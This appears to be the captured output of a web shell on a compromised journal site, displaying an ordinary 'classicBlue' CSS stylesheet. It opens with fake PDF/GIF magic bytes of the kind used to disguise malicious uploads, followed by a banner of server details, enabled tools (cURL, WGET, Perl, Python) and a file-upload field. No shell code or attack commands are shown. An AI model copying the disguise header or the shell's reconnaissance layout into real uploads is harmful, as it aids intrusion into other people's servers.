%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/JournalUnpak/css/ |
Upload File : |
/**
* plugins/themes/classicBlue/classicBlue.css
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Classic blue theme stylesheet.
*
*/
body {
background-color: #fff;
font-family: "Times New Roman", Times, Georgia, serif;
}
a {
text-decoration: none;
}
a:link {
color: #069;
}
a:active {
color: #39c;
}
a:visited {
color: #069;
}
a:hover {
color: #EEEEFF;
background: #069;
}
label.error {
color: #f60;
}
input.defaultButton {
color: #EEEEFF;
background: #069;
}
#container {
background-color: #fff;
font-size: 1em;
}
#header {
min-height: 100px;
background-color: #fff;
}
#headerTitle {
text-align: center;
}
#header h1 {
line-height: 2.5;
font-family: "Times New Roman", Times, Georgia, serif;
text-transform: uppercase;
letter-spacing: 10px;
font-size: 2em;
background-color: #069;
color: #fff;
}
#footer {
background-color: #069;
color: #fff;
}
#footerContent {
color: #fff;
}
#main {
background-color: #fff;
border-top: 1px solid yellow;
border-bottom: 1px dotted #069;
margin-top: 15px;
}
#main h2 {
font-family: "Times New Roman", Times, Georgia, serif;
text-transform: uppercase;
}
#main h3 {
font-family: "Times New Roman", Times, Georgia, serif;
text-transform: uppercase;
}
#navbar {
border-bottom: 1px dotted #069;
text-align: center;
}
#breadcrumb {
height: 18px;
line-height: 1.5em;
text-align: center;
border-bottom: 1px dotted #069;
padding: 0;
font-style: italic;
}
#content {
border-top: 1px dotted #069;
}
#content h3 {
font-family: "Times New Roman", Times, Georgia, serif;
text-transform: uppercase;
}
#content h4 {
font-family: "Times New Roman", Times, Georgia, serif;
text-transform: uppercase;
}
#content h5 {
text-transform: uppercase;
}
span.highlight {
border-bottom: 1px dotted #069;
}
table.listing tr.highlight {
background: #fcff64;
}
table.listing tr.fastTracked {
background-color: #EEEEFF;
}
table.listing td.headseparator {
border-top: 1px dotted #069;
}
table.listing td.endseparator {
border-top: 1px dotted #069;
}
span.formError {
color: #f60;
}
ul.formErrorList {
color: #f60;
}
div.separator {
border-bottom: 1px dotted #069;
}
#rightSidebar ul, #leftSidebar ul {
margin-left: 0px;
padding-left: 0px;
}
#rightSidebar li, #leftSidebar li {
list-style-type: none;
}
#rightSidebar, #leftSidebar {
margin-top: 5px;
border-bottom: 1px dotted #069;
}